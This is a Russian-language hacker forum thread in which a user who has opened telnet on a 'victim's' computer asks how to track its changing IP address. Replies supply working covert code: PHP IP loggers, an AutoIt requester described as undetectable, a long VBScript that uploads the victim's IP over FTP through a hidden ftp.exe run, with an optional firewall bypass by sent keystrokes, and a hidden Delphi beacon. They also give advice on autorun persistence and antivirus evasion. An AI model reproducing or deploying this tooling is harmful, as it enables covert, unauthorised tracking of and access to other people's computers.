Как узнавать IP жертвы с динамичным адресом.

Ситуация: Открыл телнет у компа жертвы. Первый раз зашел на комп, все окей. Но после того как жертва перезагружает тачку меняется IP. Как теперь попасть на комп? Панимаю можно паслать через сетевой снифер. Но постоянно кидать ее на снифер не вариант. Я так думаю... Как разобраться с такой проблемой? Те как всегда знать ее IP?

 

Те как всегда знать ее IP?
Постоянно коннектится к ней

 

Вбить в крон инет-качалку со ссылкой на снифер, который запишет айпи в лог. Либо написать маленькую прогу, которая будет делать тоже самое.

 

Перечитай мой пост...

 

А можно поподробнее и если незатруднит пример...

 

троя ему залей, и пусть он те логи шлет когда скажешь.
или подключи ему dyndns ))и ему приятно и тебе полезно))))

 

какого троя то?

 

Кури в сторону hamachi (как только он будет в сети он будет у тя в онлайне )

 

блин..... нарыл програмулинку, вроде пахала и ее непалил антивирус.... сегодня начал соберарать все во едино и антивирус палит прогу...
ipbot.exe

 

Если у тебя есть хост, то:
Заливаешь туда скрипт пыховский:
<?php
file = fopen("log.txt","w");
fwrite(file,$_SERVER['REMOTE_ADDR']);
fclose(file);
?>
На вражеском компе в авторан мини скрипт, запрашивающий эту страничку
Смотрим log.txt и там ву-а-ля: IP жертвы

 

"мини скрипт" можно поподробней... И желательно так чтоб каждый час например запрашивал

 

Лучше всего конечно ASM + Winsock, но можно вполне и на делфи написать. В общем пишешь через indy (компонент IdHTTP) программу, которая будет посылать GET запрос на указанный хост, который в свою очередь содержит скрипт, записывающий в логи айпи. Ну и сделай это все в таймере. Интервал поставь какой надо. И пропиши программу в автозагрузку. Вот собственно и весь метод.

 

AutoIt код:

Code:

#include <HTTP.au3>
$host = "www.php.jim"
$page = "/some.php"
$http = _HTTPConnect($host)
_HTTPGet($host,$page,$http)

HTTP.au3

Компилиш и вот тебе беспалевный ехешник,как в авторан запихать расказывать не буду, думаю тебе мои способы покажутся палевными (я ядро винды не лапаю Oo)

 

vb script если нужно под себя подделаешь

Code:

On Error Resume Next
newfolderpath = "C:\WEB" 'Папка где находится скрипт
login="фтп-логин"
password="фтп-пасс"
ftpp="ftp.narod.ru"
'=================================================  ===
' Узнаем текущий IP и пишем его в файл
'=================================================  ===
set objLocator = WScript.CreateObject("WbemScripting.SWbemLocator")
    set objService = objLocator.ConnectServer (server, "", username, password)
    strQuery = "Select IPAddress from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE"
    set objEnumerator = objService.ExecQuery(strQuery)
    for each obj in objEnumerator
        if Not IsNull(obj.IPAddress) then 
            for i=LBound(obj.IPAddress) to UBound(obj.IPAddress)
                GetIPaddress = obj.IPAddress(i)
'Узнаем текущий (реальный) наш IP
Str = GetIPaddress
           next
        end if
next
FileDestination = "ip.txt"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Destination = FSO.CreateTextFile(FileDestination)
Destination.WriteLine Str
set Destination = Nothing
Set FSO = Nothing
set objLocator = Nothing
'=================================================  ==================================================  ============
'Отправляем на фтп текущий IP
'Отсылаем на ФТП на narod.ru
'Создаем файл сценария для FTP.EXE 
set FSO = CreateObject("Scripting.FileSystemObject") 
Set WSHshell = WScript.CreateObject("WScript.Shell") 
Set sDir = WSHshell.Environment("Process")    ' - находим путь к папке Windows 
Set cScript = fso.CreateTextFile (sDir("windir") & "\FTp.scr")  '-Обозначаем место, где будет создан и сохранен файл сценария (в данном случае - папочка виндовз) 
cScript.WriteLine "Open " & ftpp & "" '- Открываем соединение с сайтом ftp.narod.ru на 21 порту 
cScript.WriteLine "" & login & "" '- Имя пользователя 
cScript.WriteLine "" & password & "" '- Пароль 
cScript.WriteLine "drive C:" '- Выбраем диск С
cScript.WriteLine "lcd " & newfolderpath ' - Устанавливаем папку, откуда будем отсылать данные
cScript.WriteLine "prompt" ' - Отключаем всякий диалог по каждому файлу
cScript.WriteLine "binary" ' - метод передачи файлов по FTP
cScript.WriteLine "PUT ip.txt"'- Отправляем IP
cScript.WriteLine "bye" '-разрываем соединение с ftp.narod.ru 
cScript.Close '- Конец записи в файл сценария 
' Запускаем FTP-сценарий 
WSHshell.Run sDir("windir") & "\system32" & "\FTP.ExE -s:" & sDir("windir") & "\FTp.scr", 0
' Обходим фаер (в данном случае Outpost, если надо, раскоментируйте с помощью символа " ' " все строчки, что ниже, до '---------------------------)
'set w=CreateObject("WScript.Shell")
'a=0
'do
'r=W.AppActivate("ftp.exe")
'if r then
'a=1
'w.SendKeys "{tab 2}"
'w.SendKeys "{enter}"
'end if
'loop until a=1
'set w=Nothing
'---------------------------
Set fso = Nothing 
Set WSHshell  = Nothing 
'=================================================  ===
'А теперь запускаем цикл проверки на изменение IP
'=================================================  ===
Const ForReading = 1
Str=1
s=2
if Str<>s then
While 1
WScript.Sleep 10000 ' Сканим на изменение IP раз в 15 минут
    set objLocator = WScript.CreateObject("WbemScripting.SWbemLocator")
    set objService = objLocator.ConnectServer (server, "", username, password)
    strQuery = "Select IPAddress from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE"
    set objEnumerator = objService.ExecQuery(strQuery)
    for each obj in objEnumerator
        if Not IsNull(obj.IPAddress) then 
            for i=LBound(obj.IPAddress) to UBound(obj.IPAddress)
                GetIPaddress = obj.IPAddress(i)
'Узнаем текущий (реальный) наш IP
Str = GetIPaddress
           next
        end if
next
Set FSO = Nothing
set objLocator = Nothing
Set FSO = CreateObject("Scripting.FileSystemObject")
Set ts = FSO.OpenTextFile("ip.txt", ForReading) 
   s = ts.ReadLine 
   ts.Close
Set FSO = Nothing
Set ts = Nothing
if Str<>s then
FileDestination = "ip.txt"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Destination = FSO.CreateTextFile(FileDestination)
Destination.WriteLine Str
set Destination = Nothing
Set FSO = Nothing
'=================================================  ==================================================  ============
'Отправляем на фтп новый IP (уже в цикле, каждые 15 минут, в случае, если IP изменился)
'Отсылаем на ФТП на narod.ru
'Создаем файл сценария для FTP.EXE 
set FSO = CreateObject("Scripting.FileSystemObject") 
Set WSHshell = WScript.CreateObject("WScript.Shell") 
Set sDir = WSHshell.Environment("Process")    ' - находим путь к папке Windows 
Set cScript = fso.CreateTextFile (sDir("windir") & "\FTp.scr")  '-Обозначаем место, где будет создан и сохранен файл сценария (в данном случае - папочка виндовз) 
cScript.WriteLine "Open " & ftpp & "" '- Открываем соединение с сайтом ftp.narod.ru на 21 порту 
cScript.WriteLine "" & login & "" '- Имя пользователя 
cScript.WriteLine "" & password & "" '- Пароль 
cScript.WriteLine "drive C:" '- Выбраем диск С
cScript.WriteLine "lcd " & newfolderpath ' - Устанавливаем папку, откуда будем отсылать данные
cScript.WriteLine "prompt" ' - Отключаем всякий диалог по каждому файлу
cScript.WriteLine "binary" ' - метод передачи файлов по FTP
cScript.WriteLine "PUT ip.txt"'- Отправляем куки от IE
cScript.WriteLine "bye" '-разрываем соединение с ftp.narod.ru 
cScript.Close '- Конец записи в файл сценария 
' Запускаем FTP-сценарий 
WSHshell.Run sDir("windir") & "\system32" & "\FTP.ExE -s:" & sDir("windir") & "\FTp.scr", 0
' Обходим фаер (в данном случае Outpost, если надо, раскоментируйте с помощью символа " ' " все строчки, что ниже, до '---------------------------)
'set w=CreateObject("WScript.Shell")
'a=0
'do
'r=W.AppActivate("ftp.exe")
'if r then
'a=1
'w.SendKeys "{tab 2}"
'w.SendKeys "{enter}"
'end if
'loop until a=1
'set w=Nothing
'---------------------------
Set fso = Nothing 
Set WSHshell  = Nothing 
end if
Wend
end if

этот скрипт меня не раз выручал Ну в общем дерзай

 

Не работает у меня приходит левый IP

 

Ты хотябы со скриптом разобрался ? Как видишь этот скрипт выполняет следующие ф-ции:
1. распознает ВНУТРЕСЕТЕВОЙ ip
2. сохраняет его в txt
3. отправляет его тебе на ftp
...
Ну в общем не чего сложного!
Тебе нужен внутресетевой или внешний ip?

 

Хм... да ты прав А как его переделать под внешний ip?

 

Вот код на делфи. Передает айпи на скрипт ip.php, который принимает его и записывает в файл ip.txt. Кидаем на форму три компонента - таймер, IdHTTP (Indy Clients) и IdIpWatch (Indy Misc).

Выставляем интервал таймера. Он отвечает за скорость передачи на скрипт айпи. 1000 = 1 сек.

Затем клацаем Project - View Source, и там дописываем одну строчку - Application.ShowMainForm:=False;

Должно получиться вот так:

Это сделает твою программу скрытой.

Вот php скрипт, который принимает IP:

PHP:

<?php
$file = fopen("ip.txt","a");
fwrite($file, $_GET['ip']);
fwrite($file, "\r\n");
fclose($file);
?>

Все айпи будут записанные в ip.txt

 

Nik(rus), а иконка AutoIt в трее совсем не палевная, да?

 

Обычно все хацкеры стараются получить внутренний ip Зачем тебе внешний?